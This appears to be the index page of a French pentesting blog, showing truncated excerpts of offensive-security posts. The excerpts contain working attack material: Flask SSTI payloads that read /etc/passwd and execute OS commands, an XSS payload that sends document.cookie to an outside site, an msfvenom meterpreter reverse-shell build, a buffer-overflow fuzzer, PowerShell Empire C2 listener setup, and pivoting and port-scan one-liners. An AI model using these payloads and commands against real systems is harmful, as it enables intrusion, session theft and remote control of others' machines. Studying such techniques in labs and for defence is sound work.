Un exploit permis l’acquisition de droits supplémentaires (non prévus par l’administrateur)
pip3 install xsrfprobe xsrfprobe -u http://server/endpoint Vulnérabilité CSRF un fichier sur un serveur tiers, lorsque visité par une victime, permet l’exécution de code sur le serveur vulnérable (avec les droits de la victime) URL d’un image (invisible pour la victime) qui exécute du code sur un serveur vulnérable. La victime n’a fait qu’ouvrir le lien … Continuer la lecture
SSTI (Server Side Template Injection) Pour Flask, on peut vérifier avec {{2+2}} Avec un résultat positif (4), on sait que le serveur est vulnérable. On peut essayer de lire des fichiers avec ce payload {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} ou d’exécuter du code {{config.__class__.__init__.__globals__['os'].popen(<command>).read()}} Pour une liste de payloads Il existe aussi un outil pour l’automatisation : … Continuer la lecture
SSRF (Server Side request forgery) Par exemple, vous pouvez vous connecter à un site web qui utilise des bases de données comme elasticsearch ou mysql sur leur réseau local, mais vous ne pouvez y accéder directement. Si vous pouvez exécuter un script sur le serveur qui permet d’inclure un URL, il est possible que vous … Continuer la lecture
Vérifier si un site est vulnérable à une faille XSS (réflexion). On entre ce code dans une boîte de recherche. Si rien n’est filtré, souvent, dans le résultat de recherche, les termes recherchés sont affichés. <script>alert("Hello")</script> <script>alert(window.location.hostname)</script> #alternative Afficher le cookie du site <script>alert(document.cookie)</script> Voler un cookie <script>document.location='http://www.searchevolution.com/log/'+document.cookie</script> Changer le contenu de la page web … Continuer la lecture
On va utiliser immunity debugger avec le plugin mona !mona config -set workingfolder c:\mona\%p Fuzzer (on essaie de crasher l’application en augmentant gradullement la taille du buffer) #!/usr/bin/env python3 import socket, time, sys ip = "10.10.95.149" port = 1337 timeout = 5 prefix = "OVERFLOW1 " string = prefix + "A" * 100 while True: … Continuer la lecture
Si on se rend compte que nous avons les privilèges SeDebugPrivilege, SeImpersonatePrivilege, nous pouvons obtenir le compte system, en utilisant le module incognito de meterpreter Nous créer le code initial pour avoir une session meterpreter msfvenom -p windows/meterpreter/reverse_tcp -a x86 –encoder x86/shikata_ga_nai LHOST=10.9.0.24 LPORT=6666 -f exe -o shell.exe Téléchargement du code sudo python -m http.server … Continuer la lecture
exiftool -Comment=”” test.jpeg.php
Liste de framework disponible Cobalt Strike (Payant) Covenant Merlin Shadow PoshC2 powershell empire Nous nous attarderons ici à powershell empire sudo apt install powershell-empire starkiller #installation. starkiller est l'interface web. https://localhost:1337. empireadmin/password123 sudo powershell-empire server #fichier de configuration dans /usr/share/powershell-empire/empire/client/config.yaml powershell-empire client uselistener http set Name CLIHTTP set Host Host 10.9.0.60 #notre adresse IP set … Continuer la lecture
Pivoter Enumeration des hôtes actifs ./nmap -sn 10.x.x.1-255 -oN scan-USERNAME for i in {1..255}; do (ping -c 1 172.16.0.${i} | grep "bytes from" &); done #alternative Détermination des ports actifs sur un hôtes for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done Configuration de proxychains Les fichiers de … Continuer la lecture
Il est possible de télécharger ou téléverser des fichiers à partir de Evil-WinRM avec les commandes upload et download Il est possible de rendre accessible des scripts powershell qui se situent sur la machine de l’attaquant evil-winrm -u USERNAME -p PASSWORD -i IP -s /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/ Invoke-Portscan.ps1 Get-Help Invoke-Portscan Invoke-Portscan -Hosts 10.9.0.70 -TopPorts 50 Il existe … Continuer la lecture